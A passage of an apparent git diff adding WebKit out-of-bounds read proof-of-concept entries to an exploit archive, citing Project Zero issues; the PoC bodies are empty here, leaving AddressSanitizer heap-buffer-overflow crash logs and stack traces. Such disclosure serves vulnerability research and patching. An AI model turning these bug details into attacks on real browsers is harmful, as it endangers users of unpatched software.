WTF::fastMalloc(unsigned long) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a) + #6 0x11d080ff8 in WTF::Ref WTF::StringImpl::createUninitializedInternalNonEmpty(unsigned int, unsigned short*&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d32ff8) + #7 0x11d07f8f3 in WTF::Ref WTF::StringImpl::createInternal(unsigned short const*, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d318f3) + #8 0x11d07f80d in WTF::StringImpl::create(unsigned short const*, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d3180d) + #9 0x11d0b2188 in WTF::String::String(unsigned short const*, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d64188) + #10 0x1107e1afc in WTF::NeverDestroyed::NeverDestroyed(unsigned short const*&&, int&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8f0afc) + #11 0x112523429 in WebCore::RenderCombineText::combineText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2632429) + #12 0x112014105 in WebCore::BreakingContext::handleText(WTF::Vector&, bool&, unsigned int&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2123105) + #13 0x112011929 in WebCore::LineBreaker::nextLineBreak(WebCore::BidiResolverWithIsolate&, WebCore::LineInfo&, WebCore::LineLayoutState&, WebCore::RenderTextInfo&, WebCore::FloatingObject*, unsigned int, WTF::Vector&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2120929) + #14 0x1124a67c1 in WebCore::RenderBlockFlow::layoutRunsAndFloatsInRange(WebCore::LineLayoutState&, 
WebCore::BidiResolverWithIsolate&, WebCore::InlineIterator const&, WebCore::BidiStatus const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25b57c1) + #15 0x1124a49f5 in WebCore::RenderBlockFlow::layoutRunsAndFloats(WebCore::LineLayoutState&, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25b39f5) + #16 0x1124ab383 in WebCore::RenderBlockFlow::layoutLineBoxes(bool, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25ba383) + #17 0x1124725f7 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25815f7) + #18 0x11242caa2 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x253baa2) + #19 0x112477a3c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2586a3c) + #20 0x1124741c2 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25831c2) + #21 0x112472602 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2581602) + #22 0x11242caa2 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x253baa2) + #23 0x112477a3c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, 
WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2586a3c) + #24 0x1124741c2 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25831c2) + #25 0x112472602 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2581602) + #26 0x11242caa2 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x253baa2) + #27 0x112477a3c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2586a3c) + #28 0x1124741c2 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25831c2) + #29 0x112472602 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2581602) + +SUMMARY: AddressSanitizer: heap-buffer-overflow (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b574) in WTF::StringImpl::at(unsigned int) const +Shadow bytes around the buggy address: + 0x1c060001eb60: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd + 0x1c060001eb70: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd + 0x1c060001eb80: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa + 0x1c060001eb90: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd + 0x1c060001eba0: fa fa 00 00 00 00 fa fa fd fd fd fd fa fa fd fd +=>0x1c060001ebb0: fd fd fa fa fd fd fd fd fa fa 00 00[06]fa 
fa fa + 0x1c060001ebc0: fd fd fd fa fa fa 00 00 00 fa fa fa 00 00 00 fa + 0x1c060001ebd0: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 + 0x1c060001ebe0: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa + 0x1c060001ebf0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa + 0x1c060001ec00: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==30388==ABORTING +*/ \ No newline at end of file diff --git a/platforms/multiple/dos/43171.js b/platforms/multiple/dos/43171.js new file mode 100644 index 000000000..27c1dece2 --- /dev/null +++ b/platforms/multiple/dos/43171.js @@ -0,0 +1,149 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1349 + +There is an out-of-bounds read security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. + +PoC: + +================================================================= +*/ + + + +
+ +
+
+ + + +/* +================================================================= + +ASan log: + +================================================================= +==30436==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x606000560c48 at pc 0x00010c8f583a bp 0x7fff5c1a8e70 sp 0x7fff5c1a8e68 +READ of size 4 at 0x606000560c48 thread T0 +==30436==WARNING: invalid path to external symbolizer! +==30436==WARNING: Failed to use and restart external symbolizer! + #0 0x10c8f5839 in WebCore::SimpleLineLayout::RunResolver::Run::logicalLeft() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ba4839) + #1 0x10c8fd2cb in WebCore::SimpleLineLayout::RunResolver::runForPoint(WebCore::LayoutPoint const&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bac2cb) + #2 0x10c8f533f in WebCore::SimpleLineLayout::textOffsetForPoint(WebCore::LayoutPoint const&, WebCore::RenderText const&, WebCore::SimpleLineLayout::Layout const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ba433f) + #3 0x10c635a06 in WebCore::RenderText::positionForPoint(WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28e4a06) + #4 0x10c2f5080 in WebCore::RenderBlockFlow::positionForPoint(WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25a4080) + #5 0x10a4e350a in WebCore::Document::caretRangeFromPoint(WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79250a) + #6 0x10a4e3301 in WebCore::Document::caretRangeFromPoint(int, int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x792301) + #7 0x10b0fb98b in 
WebCore::jsDocumentPrototypeFunctionCaretRangeFromPointBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13aa98b) + #8 0x10b0e0c28 in long long WebCore::IDLOperation::call<&(WebCore::jsDocumentPrototypeFunctionCaretRangeFromPointBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x138fc28) + #9 0x4f28e9401027 () + #10 0x11825fe49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #11 0x11825fe49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #12 0x118258f6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) + #13 0x117ebc847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) + #14 0x117e3d88a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) + #15 0x117456731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) + #16 0x1174569a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) + #17 0x117456d13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) + #18 0x10af8f615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) + #19 0x10b3a26cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) + #20 0x10a70e010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) + #21 0x10a70dae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) + #22 0x10a6d5b97 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x984b97) + #23 0x10a6d6b2f in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x985b2f) + #24 0x10a6d6553 in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x985553) + #25 0x10cc0d5f2 in 
WebCore::SVGSMILElement::dispatchPendingEvent(WebCore::EventSender*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ebc5f2) + #26 0x10cc0d92a in WebCore::EventSender::dispatchPendingEvents() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ebc92a) + #27 0x10ccfd242 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fac242) + #28 0x10bebbe74 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x216ae74) + #29 0x7fffd5298c53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53) + #30 0x7fffd52988de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de) + #31 0x7fffd5298439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439) + #32 0x7fffd528fb80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80) + #33 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) + #34 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) + #35 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) + #36 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) + #37 
0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53) + #38 0x7fffd35047ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed) + #39 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da) + #40 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d) + #41 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) + #42 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) + #43 0x103a5356c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) + #44 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) + +0x606000560c48 is located 8 bytes to the right of 64-byte region [0x606000560c00,0x606000560c40) +allocated by thread T0 here: + #0 0x103abbd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) + #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) + #2 0x118927ad4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4) + #3 0x118925d6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d) + #4 0x1188ac247 in bmalloc::Allocator::allocate(unsigned long) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247) + #5 0x1188ab63a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a) + #6 0x10c8e7fdc in WebCore::SimpleLineLayout::Layout::create(WTF::Vector const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b96fdc) + #7 0x10c8e78ff in WebCore::SimpleLineLayout::create(WebCore::RenderBlockFlow&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b968ff) + #8 0x10c2d8cb5 in WebCore::RenderBlockFlow::layoutSimpleLines(bool, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2587cb5) + #9 0x10c2d25f7 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25815f7) + #10 0x10c28caa2 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x253baa2) + #11 0x10c2d7a3c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2586a3c) + #12 0x10c2d41c2 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25831c2) + #13 0x10c2d2602 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2581602) + #14 0x10c28caa2 in WebCore::RenderBlock::layout() 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x253baa2) + #15 0x10c2d7a3c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2586a3c) + #16 0x10c2d41c2 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25831c2) + #17 0x10c2d2602 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2581602) + #18 0x10c28caa2 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x253baa2) + #19 0x10c2d7a3c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2586a3c) + #20 0x10c2d41c2 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25831c2) + #21 0x10c2d2602 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2581602) + #22 0x10c28caa2 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x253baa2) + #23 0x10c69168d in WebCore::RenderView::layoutContent(WebCore::LayoutState const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294068d) + #24 0x10c6920b4 in 
WebCore::RenderView::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29410b4) + #25 0x10a8d526d in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb8426d) + #26 0x10a4e1b10 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x790b10) + #27 0x10cd35b2f in WebCore::absolutePointIfNotClipped(WebCore::Document&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fe4b2f) + #28 0x10cd35809 in WebCore::TreeScope::nodeFromPoint(WebCore::LayoutPoint const&, WebCore::LayoutPoint*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fe4809) + #29 0x10a4e349b in WebCore::Document::caretRangeFromPoint(WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79249b) + +SUMMARY: AddressSanitizer: heap-buffer-overflow (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ba4839) in WebCore::SimpleLineLayout::RunResolver::Run::logicalLeft() const +Shadow bytes around the buggy address: + 0x1c0c000ac130: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd + 0x1c0c000ac140: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa + 0x1c0c000ac150: fd fd fd fd fd fd fd fd fa fa fa fa 00 00 00 00 + 0x1c0c000ac160: 00 00 01 fa fa fa fa fa fd fd fd fd fd fd fd fd + 0x1c0c000ac170: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa +=>0x1c0c000ac180: 00 00 00 00 00 00 00 00 fa[fa]fa fa fd fd fd fd + 0x1c0c000ac190: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd + 0x1c0c000ac1a0: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa + 0x1c0c000ac1b0: 00 00 00 00 00 00 00 00 fa fa fa fa fd fd fd fd + 0x1c0c000ac1c0: fd fd fd fd fa fa fa fa fd 
fd fd fd fd fd fd fd + 0x1c0c000ac1d0: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==30436==ABORTING +*/ \ No newline at end of file diff --git a/platforms/multiple/dos/43172.js b/platforms/multiple/dos/43172.js new file mode 100644 index 000000000..6fba27ba1 --- /dev/null +++ b/platforms/multiple/dos/43172.js 
@@ -0,0 +1,152 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1350 + +There is an out-of-bounds read security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. + +PoC: + +================================================================= +*/ + + + + + + + +/* +================================================================= + +ASan log: + +================================================================= +==30453==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200007e474 at pc 0x0001130a7153 bp 0x7fff5463b410 sp 0x7fff5463b408 +READ of size 8 at 0x61200007e474 thread T0 +==30453==WARNING: invalid path to external symbolizer! +==30453==WARNING: Failed to use and restart external symbolizer! + #0 0x1130a7152 in WebCore::SVGPatternElement::collectPatternAttributes(WebCore::PatternAttributes&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e99152) + #1 0x112a5145a in WebCore::RenderSVGResourcePattern::collectPatternAttributes(WebCore::PatternAttributes&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x284345a) + #2 0x112a52ec8 in WebCore::RenderSVGResourcePattern::applyResource(WebCore::RenderElement&, WebCore::RenderStyle const&, WebCore::GraphicsContext*&, WTF::OptionSet) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2844ec8) + #3 0x112a5ba15 in WebCore::RenderSVGShape::strokeShape(WebCore::RenderStyle const&, WebCore::GraphicsContext&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x284da15) + #4 0x112a5bd93 in WebCore::RenderSVGShape::strokeShape(WebCore::GraphicsContext&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x284dd93) + #5 0x112a5bf73 in WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x284df73) + #6 0x112a5c607 in WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x284e607) + #7 0x112a5808c in WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x284a08c) + #8 0x1129f2437 in WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27e4437) + #9 0x11286144d in WebCore::RenderElement::paintAsInlineBlock(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x265344d) + #10 0x1111dca7c in WebCore::InlineElementBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfcea7c) + #11 